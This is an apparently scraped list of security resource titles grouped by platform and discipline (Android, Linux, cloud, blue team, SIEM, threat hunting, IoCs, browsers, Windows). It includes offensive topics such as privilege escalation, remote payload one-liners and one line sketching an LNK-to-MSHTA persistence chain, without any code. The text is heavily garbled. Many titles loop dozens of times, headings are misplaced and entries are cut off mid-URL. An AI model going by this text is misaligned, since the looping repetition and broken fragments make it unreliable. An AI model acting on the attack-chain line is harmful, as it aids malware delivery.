- Creating an Android Open Source Research Device on Your PC
- Project Zero
- I'm looking at a Huawei P20 from China, let see what can I found
- Tracking down the developer of Android adware affecting millions of users
- Breaking Samsung's Root of Trust: Exploiting Samsung S10 S-Boot
- Exploiting Android Messengers with WebRTC: Part 3
- Security Guidelines
- Proxying Android app traffic – Common issues / checklist
- Oscorp evolves into UBEL: an advanced Android malware spreading across the globe
- Android Application Penetration Testing Checklist
- 50 secrets codes on Android
- tip toeing past android 7’s network security configuration
-
AWS
- Prowler
- AWS IAM privileges as found using the AWS Policy Generator described at
- Endgame
- Text → AWS IAM Policy - 3 from Open AI to generate an AWS IAM policy.
-
macOS/iOS
-
Linux/ *Nix
- Ground Zero: Reverse Engineering
- Password Protected Reverse Shells – Linux x64
- Active Directory Penetration Dojo - Setup of AD Penetration Lab : Part 1 - ScriptDotSh
- Active Directory Penetration Dojo- Setup of AD Penetration Lab : Part 2 - ScriptDotSh
- Active Directory Penetration Dojo- Creation of Forest Trust: Part 3 - ScriptDotSh
- Dmesg under the hood
- Randomize your MAC address using NetworkManager
- Shadow-Box - [presentation](https://github.com/kkamagui/papers/blob/master/bevx-2018/presentation.pdf) and [other papers](https://github.com/kkamagui/papers)
- Privilege Escalation
- A cache invalidation bug in Linux memory management
- Announcing flickerfree boot for Fedora 29
- The Linux Backdoor Attempt of 2003
- GMER
- A look at home routers, and a surprising bug in Linux/MIPS
- Hacking Tricks
- Basic Linux Privilege Escalation
- Linux process infection (part I)
- tpotce - Pot Universal Installer and ISO Creator.
- Linux Privilege Escalation via LXD & Hijacked UNIX Socket Credentials
- A gentle introduction to Linux Kernel fuzzing - [code](https://github.com/cloudflare/cloudflare-blog/tree/master/2019-07-kernel-fuzzing)
- Teardown of a Failed Linux LTS Spectre Fix - inducing initial state to its correction upstream and then later brokenness when backported to all of the upstream Long Term Support (LTS) kernels.
- Ken Thompson's Unix password
- Exploiting Wi-Fi Stack on Tesla Model S
- (Ab)using Kerberos from Linux
- Privilege Escalation via Python Library Hijacking
- Logging Passwords on Linux
- Kicksecure ™ - hardened, Non-anonymous Linux Distribution
- Setuid Demystified
- Producing a trustworthy x86-based Linux appliance
- Running a quick NMAP scan to inventory my network
- 64-bit Linux stack smashing tutorial: Part 1
- Hardening ELF binaries using Relocation Read-Only (RELRO)
- Linux Threat Report 2021 1H
- Learning Linux Kernel Exploitation - Part 1 - linux-kernel-pwn-part-2/)
- Microsoft finds new elevation of privilege Linux vulnerability, Nimbuspwn
- So You Wanna Pwn The Kernel?
- Linux process infection (part I)
- Active Directory Penetration Dojo – AD Environment Enumeration -1 - ScriptDotSh
- Análise de binários em Linux
- SMB “Access is denied” caused by anti-NTLM relay protection
- Learning Linux Kernel Exploitation - Part 1 - linux-kernel-pwn-part-2/)
- Ground Zero: Reverse Engineering
-
Cloud
- Cloud Security Alliance
- CIS Controls Cloud Companion Guide
- Uncovering bad guys hiding behind CloudFlare
- Malicious Shell Script Steals Cloud Credentials
- A SOC Tried To Detect Threats in the Cloud … You Won’t Believe What Happened Next
- Cloud Native Computing Foundation
- GitHub Action Runners
- 10 real-world stories of how we’ve compromised CI/CD pipelines
-
GCP/Google
- New research: How effective is basic account hygiene at preventing hijacking - security/five-things-you-can-do-right-now-to-stay-safer-online/)
-
Azure
- Preventing Exposed Azure Blob Storage
- Open Azure blobs search on grayhatwarfare.com and other updates
- ChaosDB - Cosmos DB.
- Introducing Project Freta - us/security/research/project-freta/)
- Finding Azurescape - Account Container Takeover in Azure Container Instances
- Malicious KQL Query
- Preventing Exposed Azure Blob Storage
-
-
Blue Team
-
Volatility
- Blue Team Fundamentals
- Blue Team fundamentals Part Two
- EU MITRE ATT&CK® Community
- Mitre Att&ck Matri
- ATTACK-Tools
- Analisando ameaças com Mitre ATT&CK Navigator
- Atomic Threat Coverage
- Welcome to Stealthbits Attack Catalog
- attack-scripts
- Windows-specific MITRE ATT&CK techniques application control prevention assessment. - signed code to execute and any line of business applications. It does not make assumptions about blocking built-in abusable applications.
- Data Sources, Containers, Cloud, and More: What’s New in ATT&CK v9?
- Welcome to Stealthbits Attack Catalog
- Windows-specific MITRE ATT&CK techniques application control prevention assessment. - signed code to execute and any line of business applications. It does not make assumptions about blocking built-in abusable applications.
- Data Sources, Containers, Cloud, and More: What’s New in ATT&CK v9?
- EU MITRE ATT&CK® Community
- MITRE D3FEND
- Profile Sysmon logs to discover which LOLBAS binaries have ran and what they're command line arguments were
- Blue Team Fundamentals
- Blue Team fundamentals Part Two
- Sooty - in-one CLI tool to automate and speed up workflow.
- Your detections aren't working
- Technical Approaches to Uncovering and Remediating Malicious Activity - 245A).
- Windows Advanced Audit Policy Map to Event IDs
- takuan
- CobaltStrikeScan
- Cobalt Strike Beacon Analysis - k/)
- How to Design Detection Logic - Part 1
- MitigatingPass-the-Hashand OtherCredential Theft
- Evilginx-ing into the cloud: How we detected a red team attack in AWS
- Hidden Shares as bait
- Blue Team 201: Detection
- The DML model
- hashlookup CIRCL API
- Best Practices for MITRE ATT&CK® Mapping - cert.cisa.gov/best-practices-mitre-attckr-mapping)
- MITRE D3FEND
- Profile Sysmon logs to discover which LOLBAS binaries have ran and what they're command line arguments were
- Sysmon 12.0 — EventID 24 - us/sysinternals/downloads/sysmon) is out, with a new event ID: number 24. A very useful new feature, clipboard monitoring.
- SysmonX - In Replacement of Sysmon.
- SysmonSimulator
- Awesome Honeypots
- T-Pot
- Blue Team Fundamentals
- Blue Team fundamentals Part Two
- Sooty - in-one CLI tool to automate and speed up workflow.
- Windows Advanced Audit Policy Map to Event IDs
- Hunting and detecting Cobalt Strike
- Cobalt Strike Beacon Analysis - k/)
- MitigatingPass-the-Hashand OtherCredential Theft
- Blue Team 201: Detection
- The DML model
- hashlookup CIRCL API
- BaselineTraining - Butt Training Program: Blue Team GO!" talk.
- Practical Training for Blue Teamers
- BLUE TEAM LABS ONLINE
- There are a lot of ways that folks distinguish between blue team roles. My focus is on investigative work and cognitive skills, so I divide those roles into the mental model shown in this diagram.
- BaselineTraining - Butt Training Program: Blue Team GO!" talk.
- Practical Training for Blue Teamers
- Blue Team Fundamentals
- Blue Team fundamentals Part Two
- EU MITRE ATT&CK® Community
- Blue Team Fundamentals
- Blue Team fundamentals Part Two
- Blue Team 201: Detection
- Blue Team Fundamentals
- Blue Team fundamentals Part Two
- Blue Team Fundamentals
- Defining Cobalt Strike Components So You Can BEA-CONfident in Your Analysis
- Blue Team Fundamentals
- Blue Team fundamentals Part Two
- Blue Team Fundamentals
- Blue Team fundamentals Part Two
- Analisando ameaças com Mitre ATT&CK Navigator
- ATT&CK™ Navigator - navigator).
- Sysmon 12.0 — EventID 24 - us/sysinternals/downloads/sysmon) is out, with a new event ID: number 24. A very useful new feature, clipboard monitoring.
- Blue Team Fundamentals
- Blue Team fundamentals Part Two
- Blue Team Fundamentals
- Blue Team fundamentals Part Two
- Blue Team Fundamentals
- Blue Team fundamentals Part Two
- Blue Team Fundamentals
- Blue Team fundamentals Part Two
- Blue Team Fundamentals
- Blue Team Fundamentals
- Blue Team fundamentals Part Two
- Blue Team Fundamentals
- Blue Team fundamentals Part Two
- Blue Team Fundamentals
- Blue Team fundamentals Part Two
- Blue Team Fundamentals
- Blue Team fundamentals Part Two
- Blue Team Fundamentals
- Blue Team fundamentals Part Two
- Blue Team Fundamentals
- Blue Team fundamentals Part Two
- Blue Team Fundamentals
- Blue Team fundamentals Part Two
- Blue Team Fundamentals
- Blue Team fundamentals Part Two
- Blue Team Fundamentals
- Blue Team fundamentals Part Two
- Blue Team Fundamentals
- Blue Team fundamentals Part Two
- Blue Team Fundamentals
- Blue Team fundamentals Part Two
- Blue Team Fundamentals
- Blue Team fundamentals Part Two
- Blue Team Fundamentals
- Blue Team fundamentals Part Two
- Blue Team Fundamentals
- Blue Team fundamentals Part Two
- Blue Team Fundamentals
- Blue Team fundamentals Part Two
- Blue Team Fundamentals
- Blue Team fundamentals Part Two
- Blue Team Fundamentals
- Blue Team fundamentals Part Two
- Blue Team Fundamentals
- Blue Team fundamentals Part Two
- Blue Team Fundamentals
-
SIEM
- Auditing Continuously vs. Monitoring Continuously
- Scalable Logging and Tracking
- Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
- Suspicious Use of Procdump
- KrbRelayUp local privilege escalation.
- KrbRelayUp local privilege escalation.
- Events Heatmap
- plaso
- Heatmaps Make Ops Better
- graylog-guide-snort
- TALR
- Auditing Continuously vs. Monitoring Continuously
- Logsspot
- Scalable Logging and Tracking
- Logs were our lifeblood. Now they're our liability.
- Using Flume to Collect Apache 2 Web Server Logs
- spectx
- The log/event processing pipeline you can't have
- Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
- Here's a Splunk way to score behaviors that are derived from detections
- The Log Pile
- LORG
- Shipping to Elasticsearch Microsoft DNS Logs
- Windows 10 ETW Events - based and mof-based ETW providers across Windows 10 versions.
- Log Parser Lizard
- Laurel
- Auditing Continuously vs. Monitoring Continuously
- Corsair
- Scalable Logging and Tracking
- Logs were our lifeblood. Now they're our liability.
- Using Flume to Collect Apache 2 Web Server Logs
- The log/event processing pipeline you can't have
- Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
- ProductLoggingTracker
- Part of my role is ensuring we're *not* EDR-centric. We have to be able to detect threats w/o OS-level viz (e.g., control plane only), using auth/net events, or whatever data is in a SIEM
- Shipping to Elasticsearch Microsoft DNS Logs
- Windows 10 ETW Events - based and mof-based ETW providers across Windows 10 versions.
- Log Parser Lizard
- Laurel
- Auditing Continuously vs. Monitoring Continuously
- Scalable Logging and Tracking
- Using Flume to Collect Apache 2 Web Server Logs
- Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
- Log Parser Lizard
- Auditing Continuously vs. Monitoring Continuously
- Scalable Logging and Tracking
- Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
- Auditing Continuously vs. Monitoring Continuously
- Scalable Logging and Tracking
- Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
- Auditing Continuously vs. Monitoring Continuously
- Scalable Logging and Tracking
- Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
- Auditing Continuously vs. Monitoring Continuously
- Scalable Logging and Tracking
- Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
- Auditing Continuously vs. Monitoring Continuously
- Scalable Logging and Tracking
- Auditing Continuously vs. Monitoring Continuously
- Scalable Logging and Tracking
- Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
- Auditing Continuously vs. Monitoring Continuously
- Scalable Logging and Tracking
- Auditing Continuously vs. Monitoring Continuously
- Scalable Logging and Tracking
- Scalable Logging and Tracking
- Auditing Continuously vs. Monitoring Continuously
- Scalable Logging and Tracking
- Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
- Auditing Continuously vs. Monitoring Continuously
- Scalable Logging and Tracking
- Auditing Continuously vs. Monitoring Continuously
- Scalable Logging and Tracking
- Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
- Auditing Continuously vs. Monitoring Continuously
- Scalable Logging and Tracking
- Auditing Continuously vs. Monitoring Continuously
- Scalable Logging and Tracking
- Scalable Logging and Tracking
- Auditing Continuously vs. Monitoring Continuously
- Scalable Logging and Tracking
- Auditing Continuously vs. Monitoring Continuously
- Scalable Logging and Tracking
- Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
- Scalable Logging and Tracking
- Auditing Continuously vs. Monitoring Continuously
- Scalable Logging and Tracking
- Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
- Auditing Continuously vs. Monitoring Continuously
- Scalable Logging and Tracking
- Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
- Auditing Continuously vs. Monitoring Continuously
- Scalable Logging and Tracking
- Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
- Auditing Continuously vs. Monitoring Continuously
- Scalable Logging and Tracking
- Auditing Continuously vs. Monitoring Continuously
- Scalable Logging and Tracking
- Auditing Continuously vs. Monitoring Continuously
- Scalable Logging and Tracking
- Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
- Auditing Continuously vs. Monitoring Continuously
- Scalable Logging and Tracking
- Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
- Auditing Continuously vs. Monitoring Continuously
- Scalable Logging and Tracking
- Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
- Auditing Continuously vs. Monitoring Continuously
- Scalable Logging and Tracking
- Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
- Scalable Logging and Tracking
- Auditing Continuously vs. Monitoring Continuously
- Scalable Logging and Tracking
- Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
- Scalable Logging and Tracking
- Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
- Auditing Continuously vs. Monitoring Continuously
- Auditing Continuously vs. Monitoring Continuously
- Scalable Logging and Tracking
- Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
- Scalable Logging and Tracking
- Scalable Logging and Tracking
- Scalable Logging and Tracking
- Scalable Logging and Tracking
- Scalable Logging and Tracking
-
Threat Hunting
- Wireshark For Network Threat Hunting: Creating Filters - Active Countermeasures
- Comprehensive Threat Intelligence
- Threat-Hunting
- ThreatHunter-Playbook
- HELK - [The Hunting ELK](https://github.com/Cyb3rWard0g/HELK): The Hunting ELK or simply the HELK is one of the first open source hunt platforms with advanced analytics capabilities such as SQL declarative language, graphing, structured streaming, and even machine learning via Jupyter notebooks and Apache Spark over an ELK stack.
- 3 of the main observed false positive ive learned while hunting for cmd.exe as a child proc of rundll32.exe (still one of the top 3 pref host for backdoors implemented as dll or alike) #threathunting (understanding this kind of FPs is as important as learning new/old TTPs traces)
- thethe - focused and expandable threat hunting environment. [The Threat Hunting Environment](https://github.com/ElevenPaths/thethe)
- Capturing Network Packets from Windows Endpoints with Network Shell (Netsh) ⚔️ and Azure Network Watcher 🌩
- cyber-threat-response-clinic
- opencti - Platform/opencti)
- securityonion - release) - Linux distro for threat hunting, enterprise security monitoring, and log management
- TheHive4py
- TheHiveIRPlaybook
- Cortex-Analyzers
- Nimbus Network - class threat intelligence.
- Threat Hunting Princiĺes
- Wireshark For Network Threat Hunting: Creating Filters - Active Countermeasures
- Comprehensive Threat Intelligence
- Threat-Hunting
- ThreatHunter-Playbook
- HELK - [The Hunting ELK](https://github.com/Cyb3rWard0g/HELK): The Hunting ELK or simply the HELK is one of the first open source hunt platforms with advanced analytics capabilities such as SQL declarative language, graphing, structured streaming, and even machine learning via Jupyter notebooks and Apache Spark over an ELK stack.
- Threat Hunting Princiĺes
- TypeDB CTI - a-knowledge-graph-for-cyber-threat-intelligence-with-typedb-bdb559a92d2a)
- Watcher
- Wireshark Tutorial: Exporting Objects from a Pcap
- Hex Packet Decoder
- Packetor - dump packet analyzer / decoder.
- Termshark
- Wireshark Tutorial: Wireshark Workshop Videos Now Available
- Wireshark Tutorial: Decrypting HTTPS Traffic
- Lookup Before You Go-Go...Hunting
- Insider Threat Hunting - all-in-numbers.html).
- Cyber Threat Intelligence
- Cloud Threat Hunting: Attack & Investigation Series- Lateral Movement – Under the Radar
- A Top 10 Reading List if You’re Getting Started in Cyber Threat Intelligence
- CTI SquadGoals
- Threat Intelligence Naming Conventions: Threat Actors, & Other Ways of Tracking Threats
- Datafeeds/API
- SQUIRRELWAFFLE Leverages malspam to deliver Qakbot, Cobalt Strike
- Paint it, Blue - Transitionin from CTI to HUNT
- MISP galaxy
- DigitalSide Threat-Intel - Intel repository. [API](https://github.com/davidonzo/apiosintDS)
- MISP-sizer
- MISP RPM
- MISP CERT.br
- MISP-maltego
- MISP Concepts Cheat sheet
- teslacoil.py
- TypeDB CTI - a-knowledge-graph-for-cyber-threat-intelligence-with-typedb-bdb559a92d2a)
- traffic-analysis-workshop - tutorial-decrypting-HTTPS-traffic](https://github.com/pan-unit42/wireshark-tutorial-decrypting-HTTPS-traffic)
- Wireshark Tutorial: Exporting Objects from a Pcap
- Hex Packet Decoder
- Packetor - dump packet analyzer / decoder.
- Termshark
- Wireshark Tutorial: Wireshark Workshop Videos Now Available
- Wireshark Tutorial: Decrypting HTTPS Traffic
- Lookup Before You Go-Go...Hunting
- Insider Threat Hunting - all-in-numbers.html).
- Wazuh - ready security monitoring solution for threat detection, integrity monitoring, incident response and compliance. [repo](https://github.com/wazuh/wazuh) and [ansible](https://github.com/wazuh/wazuh-ansible)
- Hunting the Hunters - RCE in Covenant C2
- Passive SSH - ssh](https://github.com/d4-project/passive-ssh)
- Cyber Threat Intelligence
- Cloud Threat Hunting: Attack & Investigation Series- Lateral Movement – Under the Radar
- D4 core
- A Top 10 Reading List if You’re Getting Started in Cyber Threat Intelligence
- CTI SquadGoals
- Threat Intelligence Naming Conventions: Threat Actors, & Other Ways of Tracking Threats
- Datafeeds/API
- The State of Threat Hunting and the Role of the Analyst
- SQUIRRELWAFFLE Leverages malspam to deliver Qakbot, Cobalt Strike
- All Access Pass: Five Trends with Initial Access Brokers - access-broker-landscape.html) [tt](https://twitter.com/jorgeorchilles/status/1452739074775781390/photo/1)
- Paint it, Blue - Transitionin from CTI to HUNT
- MISP galaxy
- DigitalSide Threat-Intel - Intel repository. [API](https://github.com/davidonzo/apiosintDS)
- MISP-sizer
- MISP RPM
- ansible MISP
- MISP CERT.br
- misp-warninglist - positives or other information in indicators
- MISP-maltego
- misp-modules
- misp-taxonomies
- PyMISP
- MISP Concepts Cheat sheet
- teslacoil.py
- MISP Training - Youtube CIRCL
- Youtube CIRCL
- Additional MISP training materials for law-enforcement agencies
- More than a Dozen Obfuscated APT33 Botnets Used for Extreme Narrow Targeting - hacking-group-built-its-own-vpn-network/). [APT33, the Iranian hacking group behind Shamoon, built its own VPN network](https://twitter.com/campuscodi/status/1194872593750216704).
- Dismantling a fileless campaign: Microsoft Defender ATP’s Antivirus exposes Astaroth attack
- Adversary Reports
- APT29 targets COVID-19 vaccine development
- CyCAT.org API services - end server including crawlers.
- misp-taxonomies
- PyMISP
- PyMISP and MISP Objects: a door to new opportunities
- More than a Dozen Obfuscated APT33 Botnets Used for Extreme Narrow Targeting - hacking-group-built-its-own-vpn-network/). [APT33, the Iranian hacking group behind Shamoon, built its own VPN network](https://twitter.com/campuscodi/status/1194872593750216704).
- APT29 targets COVID-19 vaccine development
- What is APT28's Drovorub Malware? - 1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF)
- Dispatches from Drovorub: Network Threat Hunting for Russia GRU GTsSS' Malware at Scale
- More Evidence of APT Hackers-for-Hire Used for Industrial Espionage
- US Charges Five Alleged Members of APT41 Group
- Cyber Planning for Response and Recovery Study
- TA505
- SolarWinds Security Advisory
- If you work in a SOC, print out this screenshot & pin it to a wall in your office
- Customer Guidance on Recent Nation-State Cyber Attacks
- Mapping out AridViper Infrastructure Using Augury’s Malware Module
- The Story of Jian - Day
- APT Encounters of the Third Kind
- Lazarus APT conceals malicious code within BMP image to drop its RAT - found new [weaponized Word document](https://twitter.com/ESETresearch/status/1389904254811394049)
- Analysis of the Iranian cyber attack landscape
- Lemon Duck spreads its wings
- China’s PLA Unit 61419 Purchasing Foreign Antivirus Products, Likely for Exploitation
- The Active Adversary Playbook 2021
- An Update on Industrialize the Tracking of Botnet Operations
- Update on cyber activity in Eastern Europe
- Cisco Talos shares insights related to recent cyber attack on Cisco
- What is APT28's Drovorub Malware? - 1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF)
- Dispatches from Drovorub: Network Threat Hunting for Russia GRU GTsSS' Malware at Scale
- More Evidence of APT Hackers-for-Hire Used for Industrial Espionage
- US Charges Five Alleged Members of APT41 Group
- Analysis Report (AR20-268A)
- Cyber Planning for Response and Recovery Study
- A Threat Actor Encyclopedia
- Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor - solarwinds/) [repo](https://github.com/ThunderGunExpress/BADministration), symantec: [Supply Chain Attack Targets SolarWinds Users](https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sunburst-supply-chain-attack-solarwinds). [DGA domain names from](https://github.com/RedDrip7/SunBurst_DGA_Decode) SunBurst_DGA_Decode
- SolarWinds Security Advisory
- Customer Guidance on Recent Nation-State Cyber Attacks
- Mapping out AridViper Infrastructure Using Augury’s Malware Module
- The Story of Jian - Day
- APT Encounters of the Third Kind
- Lazarus APT conceals malicious code within BMP image to drop its RAT - found new [weaponized Word document](https://twitter.com/ESETresearch/status/1389904254811394049)
- distribute malicious zip with lnk? MSHTA > wscript > new LNK in startup > Reboot > MSHTA > wscript.
- Analysis of the Iranian cyber attack landscape
- Lemon Duck spreads its wings
- threat actortouching an endpoint
- The Active Adversary Playbook 2021
- An Update on Industrialize the Tracking of Botnet Operations
- Patchwork APT caught in its own web
- Armagedon/Gamaredon
- North Korea’s Lazarus APT leverages Windows Update client, GitHub in latest campaign
- Update on cyber activity in Eastern Europe
- Cisco Talos shares insights related to recent cyber attack on Cisco
- Wireshark For Network Threat Hunting: Creating Filters - Active Countermeasures
- Wireshark Tutorial: Exporting Objects from a Pcap
- Hex Packet Decoder
- MISP Concepts Cheat sheet
- teslacoil.py
- APT29 targets COVID-19 vaccine development
- Dispatches from Drovorub: Network Threat Hunting for Russia GRU GTsSS' Malware at Scale
- More Evidence of APT Hackers-for-Hire Used for Industrial Espionage
- US Charges Five Alleged Members of APT41 Group
- Cyber Planning for Response and Recovery Study
- Lazarus APT conceals malicious code within BMP image to drop its RAT - found new [weaponized Word document](https://twitter.com/ESETresearch/status/1389904254811394049)
- The Active Adversary Playbook 2021
- An Update on Industrialize the Tracking of Botnet Operations
- Lookup Before You Go-Go...Hunting
- Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor - solarwinds/) [repo](https://github.com/ThunderGunExpress/BADministration), symantec: [Supply Chain Attack Targets SolarWinds Users](https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sunburst-supply-chain-attack-solarwinds). [DGA domain names from](https://github.com/RedDrip7/SunBurst_DGA_Decode) SunBurst_DGA_Decode
- Lazarus APT conceals malicious code within BMP image to drop its RAT - found new [weaponized Word document](https://twitter.com/ESETresearch/status/1389904254811394049)
- North Korea’s Lazarus APT leverages Windows Update client, GitHub in latest campaign
- Capturing Network Packets from Windows Endpoints with Network Shell (Netsh) ⚔️ and Azure Network Watcher 🌩
- Tracking A Malware Campaign Through VT
- Interesting large and small malspam attachments from 2023 - vbe.py) [scripts](https://github.com/JohnHammond/vbe-decoder/blob/master/vbe-decoder.py)
- Operation Triangulation: The last (hardware) mystery
- PyMISP and MISP Objects: a door to new opportunities
- Mapping out AridViper Infrastructure Using Augury’s Malware Module
- Additional MISP training materials (including slides, documentation and videos
-
IoCs
- CVE-2020-1472 Zerologon IoCs
- Ryuk Speed Run, 2 Hours to Ransom
- What did DeathStalker hide between two ferns?
- Netfilter Rootkit Samples
- Feodo Tracker
- Emotet 2022 | epoch4 | 22.04.2022 |
- IcedID | 31.08.2022 | Campaign 2786525712
- sophos labs IoCs - originated indicators-of-compromise from published
- CVE-2020-1472 Zerologon IoCs
- APT_Digital_Weapon - AnXin.
- Ryuk Speed Run, 2 Hours to Ransom
- What did DeathStalker hide between two ferns?
- Yikes, Microsoft have signed multiple rootkits (which allow kernel drivers) and reach out to a remote IP
- Netfilter Rootkit Samples
- Feodo Tracker
- There are evil packages on the npm registry that deploy XMRIG
- Emotet 2022 | epoch4 | 22.04.2022 |
- 238 Cobalt Strike stage 2 IP's, with 238 unique configurations, identified today.
- malware-IoC
- IcedID | 31.08.2022 | Campaign 2786525712
- Feodo Tracker
- Emotet 2022 | epoch4 | 22.04.2022 |
-
-
Browsers
-
SIEM
- Firefox: How a website could steal all your cookies
- SOK: On the Analysis of Web Browser Security
- Bypassing Browser Security Warnings with Pseudo Password Fields
- How To Blow Your Online Cover With URL Previews
- Nefarious LinkedIn
- autochrome
- BROWSERGAP
- browsergap.ce
- Crash Chrome
- Firefox: How a website could steal all your cookies
- Online Trackers Increasingly Switching to Invasive CNAME Cloaking Technique
- SOK: On the Analysis of Web Browser Security
- Bypassing Browser Security Warnings with Pseudo Password Fields
- New Cache ATtacks on TLS Implementations
- How To Blow Your Online Cover With URL Previews
- Nefarious LinkedIn
- Lightnion
- Puppeteer
- autochrome
- BROWSERGAP
- browsergap.ce
- Crash Chrome
- Firefox: How a website could steal all your cookies
- Online Trackers Increasingly Switching to Invasive CNAME Cloaking Technique
- Puppeteer
- SOK: On the Analysis of Web Browser Security
- Bypassing Browser Security Warnings with Pseudo Password Fields
- BROWSERGAP
- Crash Chrome
- Firefox: How a website could steal all your cookies
- Firefox: How a website could steal all your cookies
- Firefox: How a website could steal all your cookies
- Firefox: How a website could steal all your cookies
- Firefox: How a website could steal all your cookies
- Firefox: How a website could steal all your cookies
- Firefox: How a website could steal all your cookies
- Firefox: How a website could steal all your cookies
- BROWSERGAP
- Firefox: How a website could steal all your cookies
- Firefox: How a website could steal all your cookies
- Firefox: How a website could steal all your cookies
- Firefox: How a website could steal all your cookies
- Firefox: How a website could steal all your cookies
- Firefox: How a website could steal all your cookies
- Firefox: How a website could steal all your cookies
- Firefox: How a website could steal all your cookies
- Nefarious LinkedIn
- Firefox: How a website could steal all your cookies
- Firefox: How a website could steal all your cookies
- Firefox: How a website could steal all your cookies
-
Browsers Addons
- LinkGopher
- (Image) WebDeveloper
- DownthemAll
- Uppity
- Cliget
- (Image) URLs List
- Link Redirect Trace
- Tamper Data for FF Quantum
- BuiltWith
- Wappalyzer
- Exif Viewer
- Anti-Grabify Browser Extension
- Addons for Firefox
- LinkGopher
- (Image) WebDeveloper
- (Image) IPvFoo
- DownthemAll
- SixorNot
- Uppity
- Cliget
- (Image) URLs List
- Link Redirect Trace
- Tamper Data for FF Quantum
- BuiltWith
- Wappalyzer
- Exif Viewer
- BuiltWith
-
-
Operating Systems
-
Windows
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- Introducing BloodHound 4.0: The Azure Update
- Case Study: Password Analysis with BloodHound
- Updating Mimikatz in Metasploit
- dll_to_exe
- pe-sieve - memory patches).
- A PowerShell utility to dynamically uncover a DCShadow attack
- MSRC
- DCSYNCMonitor
- Total Meltdown?
- Robber
- Remote-Desktop-Caching
- Dynamic Tracing in Windows 10 19H1
- Capturing NetNTLM Hashes with Office [DOT
- LoL Malware Meets Python-Based Command and Control (C2) Server, Part I
- Windows Command-Line
- MSconsole
- PowerShell Remoting
- Total Meltdown?
- powerlessshell
- Robber
- Remote-Desktop-Caching
- LogRM
- InvisiblePersistence
- Dynamic Tracing in Windows 10 19H1
- Capturing NetNTLM Hashes with Office [DOT
- LoL Malware Meets Python-Based Command and Control (C2) Server, Part I
- Passing-the-Hash to NTLM Authenticated Web Applications
- Detours
- r0ak - - A Command Line Utility To Read/Write/Execute Ring Zero on for Windows 10 Systems.
- SpeculationControl - 2017-5715 (Spectre variant 2) and CVE-2017-5754 (Meltdown).
- pdf - Bulazel-Reverse-Engineering-Windows-Defender-Demo-Videos/)
- XOR encryption – Windows x64
- Building Cracked Binaries – Windows x64
- Windows Command-Line
- MSconsole
- PowerShell Remoting
- Windows Incident Response: Updates
- Event log 'Keywords' p1
- Windows 10 - Notifications
- UAC bypass using CreateNewLink COM interface
- Windows Privilege Escalation (Unquoted Path Service)
- Securing SCOM in a Privilege Tiered Access Model
- Windows Privilege Escalation Guide
- An introduction to privileged file operation abuse on Windows
- Control Flow Guard Teleportation - Interactive CTF Exploration Tool
- PsExec Local Privilege Escalation
- Remote NTLM relaying through meterpreter on Windows port 445
- Analyzing obfuscated powershell with shellcode - exploitation agent.](https://github.com/EmpireProject/Empire). [OVERVIEW OF EMPIRE 3.4 FEATURES](https://www.bc-security.org/post/overview-of-empire-3-4-features/)
- Empire 4.2 was just finalized over the weekend and we are excited to share some of the new features.
- SysmonTools
- Panache_Sysmon
- Hiding malware in Windows
- Bypassing AppLocker Custom Rules
- WSL Reloaded
- Windows oneliners to download remote payload and execute arbitrary code
- reflectivepotato
- Microsoft Windows win32k.sys - Security Research
- Lateral movement using URL Protocol
- One Windows Kernel
- The Dog Whisperer’s Handbook
- Attack and Defend microsoft enhanced security administrative environment
- Recovering Plaintext Domain Credentials from WPA2 Enterprise on a Compromised Host
- How to steal NTLMv2 hashes using file download vulnerability in web application
- OrgKit - new company with proper defaults in Windows, Offic365, and Azure
- Leveraging WSUS
- Yet another sdclt UAC bypass - elevated process. These processes have the particularity to run with high integrity level without prompting the local admin with the usual UAC window.
- Reversing and Patching .NET Binaries with Embedded References
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- Windows PowerShell Remoting
- .NET Manifesto
- Bypassing Windows User Account Control
- Run PowerShell without Powershell.exe
- Bypassing the Microsoft-Windows-Threat-Intelligence Kernel APC Injection Sensor
- Privileged Access Workstations
- Activation Contexts - loading opportunities into every process, and to perform COM hijacking without touching the registry. Unfortunately, the manifest could be replaced by another version, possibly killing your persistence by surprise.
- Understanding WdBoot (Windows Defender ELAM)
- Microsoft Finally Releases Guidance and a Script to Change the KRBTGT Account
- Deploying honeytokens in Active Directory & How to trick attackers with deceptive BloodHound paths
- CrackMapExec
- Configuring Additional LSA Protection
- Getting Malicious Office Documents to Fire with Protected View Enable
- Overview and Setup
- Blocking Process Creation
- Access Tokens and Access Checking
- Blocking DLL Loading
- A Speed-Research on Windows Explorer's Auto-Completion
- Microsoft Defender Advanced Threat Protection (ATP)
- SharePoint and Pwn
- DisableAntiSpyware
